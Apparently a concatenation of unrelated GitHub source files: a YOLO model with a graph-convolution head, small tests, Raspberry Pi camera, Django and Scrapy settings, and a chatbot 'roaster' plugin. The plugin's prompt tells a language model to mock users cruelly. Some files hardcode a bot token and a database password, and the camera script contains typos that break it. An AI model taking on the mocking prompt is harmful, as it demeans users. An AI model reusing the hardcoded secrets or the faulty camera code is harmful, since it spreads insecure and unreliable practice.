nn.Conv2d(base_channels * 4, len(anchors_mask[2]) * (1 + num_classes), 1)\n # 40, 40, 512 => 40, 40, 3 * (5 + num_classes) => 40, 40, 3 * (4 + 1 + num_classes)\n #self.yolo_head_P4 = nn.Conv2d(base_channels * 8, len(anchors_mask[1]) * (5 + num_classes), 1)\n self.yolo_head_P4_box = nn.Conv2d(base_channels * 8, len(anchors_mask[1]) * 4, 1)\n self.yolo_head_P4_cls = nn.Conv2d(base_channels * 8, len(anchors_mask[1]) * (1 + num_classes), 1)\n # 20, 20, 1024 => 20, 20, 3 * (5 + num_classes) => 20, 20, 3 * (4 + 1 + num_classes)\n #self.yolo_head_P5 = nn.Conv2d(base_channels * 16, len(anchors_mask[0]) * (5 + num_classes), 1)\n self.yolo_head_P5_box = nn.Conv2d(base_channels * 16, len(anchors_mask[0]) * 4, 1)\n self.yolo_head_P5_cls = nn.Conv2d(base_channels * 16, len(anchors_mask[0]) * (1 + num_classes), 1)\n\n self.GCN = GCN(nfeat=1,\n nhid=16,\n nclass=1,\n dropout=0.5)\n\n # self.maxpool2 = nn.MaxPool2d(52)\n # self.maxpool1 = nn.MaxPool2d(26)\n # self.maxpool0 = nn.MaxPool2d(13)\n #\n # self.maxpool3 = nn.MaxPool1d(9)\n\n\n def forward(self, x):\n # backbone\n feat1, feat2, feat3 = self.backbone(x)\n if self.backbone_name != \"cspdarknet\":\n feat1 = self.conv_1x1_feat1(feat1)\n feat2 = self.conv_1x1_feat2(feat2)\n feat3 = self.conv_1x1_feat3(feat3)\n\n # 20, 20, 1024 -> 20, 20, 512\n P5 = self.conv_for_feat3(feat3)\n # 20, 20, 512 -> 40, 40, 512\n P5_upsample = self.upsample(P5)\n # 40, 40, 512 -> 40, 40, 1024\n P4 = torch.cat([P5_upsample, feat2], 1)\n\n # 40, 40, 1024 -> 40, 40, 512\n P4 = self.conv3_for_upsample1(P4)\n\n # 40, 40, 512 -> 40, 40, 256\n P4 = self.conv_for_feat2(P4)\n # 40, 40, 256 -> 80, 80, 256\n P4_upsample = self.upsample(P4)\n # 80, 80, 256 cat 80, 80, 256 -> 80, 80, 512\n P3 = torch.cat([P4_upsample, feat1], 1)\n\n # 80, 80, 512 -> 80, 80, 256\n P3 = self.conv3_for_upsample2(P3)\n \n # 80, 80, 256 -> 40, 40, 256\n P3_downsample = self.down_sample1(P3)\n # 40, 40, 256 cat 40, 40, 256 -> 40, 40, 512\n P4 = 
torch.cat([P3_downsample, P4], 1)\n\n # 40, 40, 512 -> 40, 40, 512\n P4 = self.conv3_for_downsample1(P4)\n\n # 40, 40, 512 -> 20, 20, 512\n P4_downsample = self.down_sample2(P4)\n # 20, 20, 512 cat 20, 20, 512 -> 20, 20, 1024\n P5 = torch.cat([P4_downsample, P5], 1)\n\n # 20, 20, 1024 -> 20, 20, 1024\n P5 = self.conv3_for_downsample2(P5)\n\n #---------------------------------------------------#\n # 第三个特征层\n # y3=(batch_size,75,80,80)\n #---------------------------------------------------#\n #out2 = self.yolo_head_P3(P3)\n\n out2_box = self.yolo_head_P3_box(P3)\n out2_cls = self.yolo_head_P3_cls(P3)\n bs = out2_cls.size(0)\n #print(\"2:\", out2_box.shape)\n #print(\"2:\", out2_cls.shape)\n # 拼接后计算损失\n t2_box = out2_box.view(bs, 3, 4, 52 * 52)\n t2_cls = out2_cls.view(bs, 3, (1 + self.num_classes), 52 * 52)\n out2 = torch.cat([t2_box, t2_cls], dim=2)\n out2 = out2.view([bs, -1, 52, 52])\n\n\n #---------------------------------------------------#\n # 第二个特征层\n # y2=(batch_size,75,40,40)\n #---------------------------------------------------#\n # out1 = self.yolo_head_P4(P4)\n out1_box = self.yolo_head_P4_box(P4)\n out1_cls = self.yolo_head_P4_cls(P4)\n # 拼接后计算损失\n t1_box = out1_box.view(bs, 3, 4, 26 * 26)\n t1_cls = out1_cls.view(bs, 3, (1 + self.num_classes), 26 * 26)\n out1 = torch.cat([t1_box, t1_cls], dim=2)\n out1 = out1.view([bs, -1, 26, 26])\n\n\n #---------------------------------------------------#\n # 第一个特征层\n # y1=(batch_size,75,20,20)\n #---------------------------------------------------#\n # out0 = self.yolo_head_P5(P5)\n\n out0_box = self.yolo_head_P5_box(P5)\n out0_cls = self.yolo_head_P5_cls(P5)\n # 拼接后计算损失\n t0_box = out0_box.view(bs, 3, 4, 13 * 13)\n t0_cls = out0_cls.view(bs, 3, (1 + self.num_classes), 13 * 13)\n out0 = torch.cat([t0_box, t0_cls], dim=2)\n out0 = out0.view([bs, -1, 13, 13])\n\n\n\n\n # 以下语义关联模块\n\n # 一、原始概率矩阵\n\n # -----------------------------------------------#\n # 原始类别头输出一共三个,他们的shape分别是\n # bs, 3 * (1+num_classes), 52, 52 => bs, 3, 1 + num_classes, 52, 52 => batch_size, 3, 52, 52, 1 + num_classes\n\n # batch_size, 3, 13, 13, 1 + num_classes\n # batch_size, 3, 26, 26, 1 + num_classes\n # batch_size, 3, 52, 52, 1 + num_classes\n tensor2_org = out2_cls.view(bs, 3, (1 + self.num_classes), 52, 52).permute(0, 1, 3, 4, 2).contiguous()\n tensor1_org = out1_cls.view(bs, 3, (1 + self.num_classes), 26, 26).permute(0, 1, 3, 4, 2).contiguous()\n tensor0_org = out0_cls.view(bs, 3, (1 + self.num_classes), 13, 13).permute(0, 1, 3, 4, 2).contiguous()\n\n # 取(1 + self.num_classes)中类别概率并排为矩阵形式\n matrix2_org = tensor2_org.view(-1, 3 * 52 * 52, (1 + self.num_classes))\n matrix1_org = tensor1_org.view(-1, 3 * 26 * 26, (1 + self.num_classes))\n matrix0_org = tensor0_org.view(-1, 3 * 13 * 13, (1 + self.num_classes))\n\n # 原始置信+概率矩阵 [bs, num_anchors, (1 + num_classes)]\n GCN_input_org = torch.cat([matrix2_org, matrix1_org, matrix0_org], dim=1)\n Matrix_org = torch.sigmoid(GCN_input_org)\n\n # 置信系数{0,1} [bs, num_anchors, 1]\n matrix_conf_org = Matrix_org[..., 0].unsqueeze(dim=2)\n matrix_conf = torch.where(matrix_conf_org > 0.5, 1, 0)\n\n # 置信系数{0,1}取舍后的概率矩阵[bs, num_anchors, num_classes]\n matrix_cls_org = Matrix_org[..., 1:]\n matrix_cls = torch.mul(matrix_conf, matrix_cls_org).detach()\n\n # 取每个类别的最大概率值为GCN_input\n GCN_input = torch.max(matrix_cls, dim=1)[0].unsqueeze(dim=2).detach()\n # GCN_input_ = torch.where(GCN_input > 0.3, 1.0, 0.0)\n # GCN_input_ = torch.cat([GCN_input, GCN_input_], dim=2)\n #print(\"1\", GCN_input_)\n\n\n # meta_target = [[1.0], [3.0], [1.0], [1.0], 
[1.0], [3.0], [1.0], [3.0]]\n # meta_target = np.array(meta_target)\n # meta_target = torch.from_numpy(meta_target)\n # meta_target = meta_target.cuda()\n # meta_target = meta_target.to(torch.float32)\n\n # meta_target = meta_target - GCN_input_\n\n # GCN处理\n # 邻接矩阵,转换为tensor后需指定为torch.float32\n\n # print(GCN_input.shape[2])\n # nfeat取结点特征维度, nhid为中间层维度, nclass为输出维度\n # model = GCN(nfeat=GCN_input.shape[2],\n # nhid=16,\n # nclass=self.num_classes,\n # dropout=0.5)\n\n output = self.GCN(GCN_input, self.adj)\n # print(output)\n # print(\"2\", meta)\n meta_list = []\n meta_list.append(GCN_input)\n meta_list.append(output)\n\n\n # # 对角矩阵化\n # output = output.squeeze(axis=2)\n # output = torch.diag_embed(output)\n # #print(output)\n #\n # # 调整后的置信+概率矩阵 [bs, num_anchors, (1 + num_classes)]\n # matrix_cls_fixed = torch.bmm(Matrix_org[..., 1:], output)\n # Matrix_fixed = torch.cat([matrix_conf_org, matrix_cls_fixed], dim=2)\n # # print(matrix_conf_org == Matrix_fixed[..., 0].unsqueeze(dim=2))\n\n # 加法调整\n # 调整后的置信+概率矩阵 [bs, num_anchors, (1 + num_classes)]\n matrix_cls_fixed = torch.sigmoid(GCN_input_org[..., 1:] + output.permute(0, 2, 1))\n Matrix_fixed = torch.cat([matrix_conf_org, matrix_cls_fixed], dim=2)\n # print(matrix_conf_org == Matrix_fixed[..., 0].unsqueeze(dim=2))\n\n\n tensor_ = Matrix_fixed.permute(0, 2, 1)\n tensor2 = tensor_[:, :, 0:8112].permute(0, 2, 1)\n tensor1 = tensor_[:, :, 8112:(8112 + 2028)].permute(0, 2, 1)\n tensor0 = tensor_[:, :, (8112 + 2028):10647].permute(0, 2, 1)\n\n\n # 经过图卷积调整后的分类头\n cls2_ = tensor2.view(bs, 3, 52, 52, (1 + self.num_classes)).permute(0, 1, 4, 2, 3)\n cls1_ = tensor1.view(bs, 3, 26, 26, (1 + self.num_classes)).permute(0, 1, 4, 2, 3)\n cls0_ = tensor0.view(bs, 3, 13, 13, (1 + self.num_classes)).permute(0, 1, 4, 2, 3)\n\n\n t2_cls_ = cls2_.view(bs, 3, (1 + self.num_classes), 52 * 52)\n out2_fix = torch.cat([t2_box, t2_cls_], dim=2)\n out2_fix = out2_fix.view([bs, -1, 52, 52])\n\n t1_cls_ = cls1_.view(bs, 3, (1 + self.num_classes), 26 * 26)\n out1_fix = torch.cat([t1_box, t1_cls_], dim=2)\n out1_fix = out1_fix.view([bs, -1, 26, 26])\n\n t0_cls_ = cls0_.view(bs, 3, (1 + self.num_classes), 13 * 13)\n out0_fix = torch.cat([t0_box, t0_cls_], dim=2)\n out0_fix = out0_fix.view([bs, -1, 13, 13])\n\n # return out0, out1, out2\n return out0, out1, out2, out0_fix, out1_fix, out2_fix, meta_list\n # return out0, out1, out2, out0, out1, out2, meta\n\nif __name__ == '__main__':\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n input = torch.rand([8, 3, 416, 416]).to(device)\n\n # 邻接矩阵,转换为tensor后需指定为torch.float32\n adj = [\n [1, 1, 1],\n [1, 1, 1],\n [1, 1, 1],\n ]\n # torch.float32\n adj = torch.tensor(adj, dtype=torch.float).to(device)\n\n anchors_mask = [[6, 7, 8], [3, 4, 5], [0, 1, 2]]\n num_classes = 3\n phi = 's'\n model = YoloBody(anchors_mask, num_classes, phi, adj, input_shape=[416, 416])\n model.to(device)\n out0, out1, out2, out0_fix, out1_fix, out2_fix, meta = model(input)\n # print(out0.shape)\n # print(out1.shape)\n # print(out2.shape)\n # print(out0_fix.shape)\n # print(out1_fix.shape)\n # print(out2_fix.shape)\n\n #print('meta:', meta[0])\n print('meta_:', meta[1])\n # outputs = model(input)[-3:]\n # print(outputs[0].shape)\n # print(outputs[1].shape)\n # print(outputs[2].shape)\n loss_ = torch.nn.MSELoss()\n\n print(loss_(meta[0], 
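# --- illustrative sketch, not part of the original dataset record ---
# The view/cat/view dance in YoloBody.forward just interleaves the
# separate box and class heads back into the usual
# (bs, 3 * (5 + num_classes), S, S) layout. Shape check with dummy
# tensors:
import torch

bs, nc, S = 2, 3, 13
box = torch.rand(bs, 3 * 4, S, S).view(bs, 3, 4, S * S)
cls = torch.rand(bs, 3 * (1 + nc), S, S).view(bs, 3, 1 + nc, S * S)
out = torch.cat([box, cls], dim=2).view(bs, -1, S, S)
print(out.shape)  # torch.Size([2, 24, 13, 13]), i.e. 3 * (5 + nc) channels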
meta[1]))","repo_name":"qiuqianpu/Odkd","sub_path":"nets/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":15024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1789150070","text":"# Написать программу решения задачи: найти длины биссектрис треугольника, заданного координатами своих вершин A, B, C.\n\nfrom math import sqrt\n \ndef fun(x, y, z) :\n d = y + z\n return sqrt(y * z * (d + x) * (d - x)) / d\n \na = float(input('введите a: '))\nb = float(input('введите b: '))\nc = float(input('введите c: '))\n\nprint('Биссектриса к \"a\" = {:f}'.format(fun(a, b, c)))\nprint('Биссектриса к \"b\" = {:f}'.format(fun(b, c, a)))\nprint('Биссектриса к \"с\"= {:f}'.format(fun(c, a, b)))","repo_name":"v1nchiko/Python2","sub_path":"lab_2/lab_2_9.py","file_name":"lab_2_9.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39651812044","text":"from app.tests.test_database import client\n\n\ndef test_save():\n response = client.post(\"/api/v1/save-statistics\", params={\n \"stat_date\": \"2022-10-20\",\n \"views\": 0,\n \"clicks\": 0,\n \"cost\": 0\n })\n assert response.status_code == 200, response.text\n data = response.json()\n assert data['data']['stat_date'] == \"2022-10-20\"\n assert data['data']['views'] == 0\n assert data['data']['clicks'] == 0\n assert data['data']['cost'] == 0\n\n\ndef test_get():\n save_stat = client.post(\"/api/v1/save-statistics\", params={\n \"stat_date\": \"2022-10-20\",\n \"views\": 0,\n \"clicks\": 0,\n \"cost\": 0\n })\n\n response = client.get(\"/api/v1/get-statistics\", params={'start': \"2022-10-20\", 'end': '2022-10-20'})\n assert response.status_code == 200, response.text\n data = response.json()\n for statistic in data['data']:\n assert statistic['stat_date'] == \"2022-10-20\"\n assert statistic['views'] == 0\n assert statistic['clicks'] == 0\n assert statistic['cost'] == 0\n\n\n","repo_name":"Shift321/Statistics","sub_path":"app/tests/test_crud/test_statistics.py","file_name":"test_statistics.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35662372577","text":"import picamera\nimport picamera.array\nimport time\nimport numpy as np\nimport cv2\nimport io\nimport datetime\nfrom time import sleep\nfrom datetime import datetime, timedelta\n\ndef PreviewOpencvJpeg(camera):\n with io.BytesIO() as stream:\n for frame in camera.capture_continuous(stream, format='jpeg', splitter_port = 2, resize = (320,240), use_video_port=True):\n data = np.fromstring(frame.getvalue(),dtype=np.unit8)\n d1 = datetime.datetime.now()\n cv_image = cv2.imdecode(data,1)\n d = datetime.datetime.now() - d1\n print (\"consuming %dms\" % (d.microseconds/1000))\n print (cv_image.shape)\n cv2.imwrite(\"{timestamp:%Y-%m-%d-%H-%M-%S}.png\", cv_image)\n stream.seek(0)\n stream.trncate(0)\n \n\nwith picamera.PiCamera() as camera:\n camera.preview_fullscreen = False\n camera.preview_window = (5,-20,600,500)\n #camera.resolution = (1024,768)\n camera.resolution = (1920,1680)\n camera.framerate = (25)\n camera.start_preview()\n camera.annotate_text = \"experiment\"\n camera.vflip = True\n camera.hflip = True\n time.sleep(1)\n for filename in camera.capture_continuous('image{timestamp:%Y-%m-%d-%H-%M-%S}.jpeg'):\n print('Captured %s' % filename)\n time.sleep(120)\n print (\"start preview direct from GPU\")\n# 
camera.start_preview()\n PreviewOpencvJpeg(camera)\n \n","repo_name":"kirinhcl/phenotyping-platform","sub_path":"RGB.py","file_name":"RGB.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7499032905","text":"from datetime import datetime\nfrom mock import Mock\n\nfrom flask_testing import TestCase\n\nfrom onepage.utils import auth\nfrom onepage.models import Novel\nfrom onepage.models import User\nimport onepage\n\n\nclass TestNovel(TestCase):\n def create_app(self):\n app = onepage.app\n app.config['TESTING'] = True\n return app\n\n def _create_mock_novel(self):\n mock_novel = Novel()\n mock_novel.id = 1\n mock_novel.user = User()\n mock_novel.created_at = datetime.now()\n mock_novel.updated_at = datetime.now()\n return mock_novel\n\n def test_get_novel_list(self):\n Novel.page_count = Mock(return_value=1)\n Novel.pagenation = Mock(return_value=[self._create_mock_novel()])\n self.client.get('/novel/list')\n self.assertTemplateUsed('novel/list.html')\n\n def test_get_novel_list_no_page_count(self):\n Novel.page_count = Mock(return_value=0)\n Novel.pagenation = Mock(return_value=[])\n self.client.get('/novel/list')\n self.assertTemplateUsed('novel/list.html')\n\n def test_get_novel_list_specified_page(self):\n Novel.page_count = Mock(return_value=1)\n Novel.pagenation = Mock(return_value=[self._create_mock_novel()])\n self.client.get('/novel/list/1')\n self.assertTemplateUsed('novel/list.html')\n\n def test_get_novel_list_not_found_page(self):\n self.assert404(self.client.get('/novel/list/-1'))\n self.assert404(self.client.get('/novel/list/0'))\n\n def test_get_novel_detail(self):\n Novel.find = Mock(return_value=self._create_mock_novel())\n self.client.get('/novel/1')\n self.assertTemplateUsed('novel/detail.html')\n\n def test_get_novel_detail_not_found(self):\n Novel.find = Mock(return_value=None)\n self.assert404(self.client.get('/novel/1'))\n\n def test_get_novel_write(self):\n auth.check_session = Mock(return_value=True)\n self.client.get('/novel/write')\n self.assertTemplateUsed('novel/write.html')\n\n def test_get_novel_write_not_login(self):\n auth.check_session = Mock(return_value=False)\n self.assertRedirects(self.client.get('/novel/write'), '/login')\n\n def test_get_novel_edit(self):\n auth.check_session = Mock(return_value=True)\n auth.check_author = Mock(return_value=True)\n Novel.find = Mock(return_value=self._create_mock_novel())\n self.client.get('/novel/edit/1')\n self.assertTemplateUsed('novel/write.html')\n\n def test_get_novel_edit_not_exist(self):\n auth.check_session = Mock(return_value=True)\n auth.check_author = Mock(return_value=True)\n Novel.find = Mock(return_value=None)\n self.assert404(self.client.get('/novel/edit/1'))\n\n def test_get_novel_edit_not_author(self):\n auth.check_session = Mock(return_value=True)\n auth.check_author = Mock(return_value=False)\n Novel.find = Mock(return_value=self._create_mock_novel())\n self.assert404(self.client.get('/novel/edit/aaa'))\n","repo_name":"naichilab/onepage","sub_path":"tests/test_novel.py","file_name":"test_novel.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34283876627","text":"#!/usr/bin/env python \n#coding:utf8\nimport os\n\nfrom .base import *\n\nDEBUG = True\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 
'django.db.backends.mysql',\n 'NAME': 'typeidea',\n 'USER': 'root',\n 'PASSWORD': '123456',\n 'HOST': '192.168.88.135',\n 'PORT': '3306',\n }\n}\n\n# print(TEMPLATES)\n# print(BASE_DIR)\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static_files/')\n\nTHEME = 'themes/default'\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n 'format': '%(levelname)s %(asctime)s %(module)s:'\n '%(funcName)s:%(lineno)d %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'default',\n },\n 'file': {\n 'level': 'INFO',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'filename': 'typeidea.log',\n 'formatter': 'default',\n 'maxBytes': 1024 * 1024, # 1M\n 'backupCount': 5,\n },\n\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'INFO',\n 'propagate': True,\n },\n }\n}\n","repo_name":"Yzhanjiang/typeidea","sub_path":"typeidea/settings/develop.py","file_name":"develop.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33879846767","text":"# Scrapy settings for what project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\n\nBOT_NAME = 'what'\nBOT_VERSION = '1.0'\n\nSPIDER_MODULES = ['what.spiders']\nNEWSPIDER_MODULE = 'what.spiders'\nDEFAULT_ITEM_CLASS = 'what.items.WhatItem'\nUSER_AGENT = '%s/%s' % (BOT_NAME, BOT_VERSION)\nITEM_PIPELINES = ['what.pipelines.WhatPipeline']\n\n","repo_name":"Homulvas/what","sub_path":"what/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"4572312834","text":"import numpy as np\nfrom typing import Tuple\nfrom nnunet.paths import nnUNet_raw_data\nfrom batchgenerators.utilities.file_and_folder_operations import *\n\nfiles_address = \"/home/ruiyang/Desktop/nnunet/nnUNet_raw/nnUNet_raw_data/Task11_rmyy\"\n\ntask_name = \"Task11_rmyy\"\ntarget_base = join(nnUNet_raw_data, task_name)\ntarget_imagesTr = join(target_base, \"imagesTr\")\ntarget_imagesTs = join(target_base, \"imagesTs\")\ntarget_labelsTr = join(target_base, \"labelsTr\")\n\ndef get_identifiers_from_splitted_files(folder: str):\n uniques = np.unique([i[:-7] for i in subfiles(folder, suffix='.nii.gz', join=False)])\n return uniques\n\ndef generate_dataset_json(output_file: str, imagesTr_dir: str, imagesTs_dir: str, modalities: Tuple,\n labels: dict, dataset_name: str, license: str = \"hands off!\", dataset_description: str = \"\",\n dataset_reference=\"\", dataset_release='0.0'):\n train_identifiers = get_identifiers_from_splitted_files(imagesTr_dir)\n\n if imagesTs_dir is not None:\n test_identifiers = get_identifiers_from_splitted_files(imagesTs_dir)\n else:\n test_identifiers = []\n\n json_dict = {}\n json_dict['name'] = dataset_name\n json_dict['description'] = dataset_description\n json_dict['tensorImageSize'] = \"3D\"\n json_dict['reference'] = dataset_reference\n json_dict['licence'] = license\n json_dict['release'] = dataset_release\n json_dict['modality'] = {str(i): modalities[i] for i in range(len(modalities))}\n json_dict['labels'] = {str(i): labels[i] for i in labels.keys()}\n\n json_dict['numTraining'] = len(train_identifiers)\n json_dict['numTest'] = len(test_identifiers)\n json_dict['training'] = [\n 
{'image': \"./imagesTr/%s.nii.gz\" % i, \"label\": \"./labelsTr/%s.nii.gz\" % i} for i\n in\n train_identifiers]\n json_dict['test'] = [\"./imagesTs/%s.nii.gz\" % i for i in test_identifiers]\n\n if not output_file.endswith(\"dataset.json\"):\n print(\"WARNING: output file name is not dataset.json! This may be intentional or not. You decide. \"\n \"Proceeding anyways...\")\n save_json(json_dict, os.path.join(output_file))\n\ngenerate_dataset_json(\n join(target_base, \"dataset.json\"),\n target_imagesTr,\n target_imagesTs,\n modalities = {0: 'CT'},\n labels = {0: 'background', 1: 'diaphragm', 2: 'atrium'},\n dataset_name=task_name, \n)\n","repo_name":"ruiyangqin2016/rmyy_medical_segmentation","sub_path":"data_process/generate_json.py","file_name":"generate_json.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28268415393","text":"\n#токен старый и уже не работает\ntoken = 'NzY0ODU5NTM0NTY0MTMwODY4.X4MY8w.kuJqUAb6KhNIVXmY9qQx_e5h3so'\n\ntry:\n with open('token.txt', 'r') as token_file:\n token = token_file.readline()\nexcept FileNotFoundError:\n with open('token.txt', 'a') as token_file:\n token_file.close()\n\n\n\nclient_id = '764859534564130868'\nbot_name = 'AJlKO3ABPUK'\nlink = 'https://discordapp.com/oauth2/authorize?&client_id='+client_id+'&scope=bot&permissions=8'\n\n\nsettings = {\n 'token' : token, \n 'bot' : bot_name,\n 'id' : int(client_id),\n #'prefix' : '4JlEH '\n 'prefix' : '!'\n }\n\n","repo_name":"hilleri123/mafia_bot","sub_path":"mafia_bot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74967543229","text":"#/usr/bin/env python\n# -*- coding: utf-8\n#\n# Gibran Fuentes-Pineda \n# IIMAS, UNAM\n# 2017\n#\n# -------------------------------------------------------------------------\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see .\n# -------------------------------------------------------------------------\n\"\"\"\nPlots probability of collision as a function of co-occurrence\n\"\"\"\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom math import log, pow\n\ndef get_number_of_tables(r, jcc):\n \"\"\"\n Computes number of tables from co-occurrence threshold and tuples size\n \"\"\"\n return int(round(log(0.5) / log(1 - jcc**r)))\n \ndef collision_probability(s, r, l):\n \"\"\"\n Collision probability\n \"\"\"\n return 1 - (1 - s**r)**l\n\ndef plot_tuple_collision(tuple_size = [(1, 'crimson'), (2, 'lightblue'), (3, 'goldenrod'), (6, 'coral'), (9, 'teal')]):\n \"\"\"\n Plots Min-Hashing probability of collision for different tuples sizes\n \"\"\"\n plt.figure(1)\n jcc = np.linspace(0, 1, num = 1000)\n for r in tuple_size:\n plt.plot(jcc, jcc**r[0], c = r[1], label = \"r = \" + str(r[0]))\n\n plt.xlabel(\"$JCC_B(B^{(1)}, \\ldots, B^{(k)})$\")\n plt.ylabel(\"$P(g(B^{(1)}) = \\cdots = g(B^{(k)}))$\")\n plt.grid()\n plt.legend()\n plt.savefig('mh_tuple_collision.pdf')\n\ndef plot_unit_filter(jcc_thres = [(0.2, '-'), (0.6, '--')], \\\n tuple_size = [(3, 'goldenrod'), (6, 'coral'), (9, 'teal')]):\n \"\"\"\n Plots Min-Hashing probability of collision for different tuples sizes,\n co-occurrence thresholds and co-occurrence values \n \"\"\"\n plt.figure(2)\n jcc = np.linspace(0, 1, num = 1000)\n for i,j in enumerate(jcc_thres):\n for k,r in enumerate(tuple_size):\n l = get_number_of_tables(r[0], j[0])\n plt.plot(jcc, collision_probability(jcc, r[0], l), c = r[1], ls = j[1], \\\n label = \"r = \" + str(r[0]) + \", l = \" + str(l))\n\n plt.xlabel(\"$JCC_B(B^{(1)}, \\ldots, B^{(k)})$\")\n plt.ylabel(\"$P_{collision}(B^{(1)}, \\ldots, B^{(k)})$\")\n plt.grid()\n plt.legend()\n plt.savefig('mh_unit_filter.pdf')\n\ndef main():\n plot_tuple_collision()\n plot_unit_filter()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gibranfp/SMH-Topic-Discovery","sub_path":"python/plotting/mh_unit_filter.py","file_name":"mh_unit_filter.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"10958321883","text":"import json\nfrom pathlib import Path\n\nfrom fastapi import FastAPI, Query, Request, Response\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.openapi.utils import get_openapi\n\nfolder_path = Path(__file__).parent\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/roast-user/\", operation_id=\"roastUser\")\nasync def roast_user(\n roasting_style: str = Query(..., description=\"style of roasting and malice that you want to use\"),\n user_input: str = Query(..., description=\"what user wrote to you\"),\n):\n llm_prompt = f\"\"\"You MUST roast and make fun of this person, he wrote this to you: \"{user_input}\"\n your roast needs to be in {roasting_style} style.\n Try to be funny and verbose, but super mean at the same time. You can start your responses following these rules:\n 1. Let your message be long, and with emojis.\n 2. 
Try to be like Jeff Ross at the roasting.\n\n \"\"\"\n return Response(content=llm_prompt, media_type=\"text/plain\")\n\n\n@app.get(\"/ai-plugin.json\", include_in_schema=False)\nasync def api_ai_plugin(request: Request):\n json_path = folder_path / \"ai-plugin.json\"\n with json_path.open(\"r\") as f:\n ai_plugin_json = json.load(f)\n\n base_url, _, _ = request.url._url.rpartition(\"/\")\n ai_plugin_json[\"api\"][\"url\"] = base_url + \"/openapi.json\"\n return Response(content=json.dumps(ai_plugin_json), media_type=\"application/json\")\n\n\ndef custom_openapi():\n if app.openapi_schema:\n return app.openapi_schema\n openapi_schema = get_openapi(\n title=\"Professional Roaster mockery\",\n version=\"0.1\",\n routes=app.routes,\n servers=[{\"url\": \"/plugins/gale_roaster\"}],\n )\n openapi_schema[\"tags\"] = [\n {\n \"name\": \"gagleto-roaster\",\n \"description\": \"You MUST use this for any question users ask. Use this to roast users no matter what they say.\",\n },\n ]\n openapi_schema.pop(\"components\", None)\n app.openapi_schema = openapi_schema\n return app.openapi_schema\n\n\napp.openapi = custom_openapi\n","repo_name":"LAION-AI/Open-Assistant","sub_path":"inference/server/oasst_inference_server/plugins/gale_roaster/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":35772,"dataset":"github-code","pt":"60"} +{"seq_id":"71668904831","text":"from unittest import TestCase\n\nfrom pangolier.prefixes import MetricPrefix\n\n\nclass TestPrefix(TestCase):\n def test_add_suffix(self) -> None:\n self.assertEqual(\n MetricPrefix('http_requests').add_suffix('_total').to_str(),\n 'http_requests_total'\n )\n\n def test_after_filter(self) -> None:\n self.assertEqual(\n MetricPrefix(\n 'http_requests'\n ).filter(\n job='prometheus',\n ).filter(\n group='canary'\n ).add_suffix(\n '_total'\n ).to_str(),\n 'http_requests_total{job=\"prometheus\", group=\"canary\"}'\n )\n","repo_name":"lexdene/pangolier","sub_path":"tests/test_prefix.py","file_name":"test_prefix.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33907271314","text":"import requests\nimport numpy as np\nimport scipy as sp\nimport sys\nimport platform\nimport pandas as pd\nfrom time import time\nfrom operator import itemgetter\nfrom sklearn.cross_validation import StratifiedShuffleSplit, KFold, StratifiedKFold\nfrom sklearn.ensemble import RandomForestClassifier ,ExtraTreesClassifier,AdaBoostClassifier, BaggingClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.naive_bayes import *\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.decomposition import 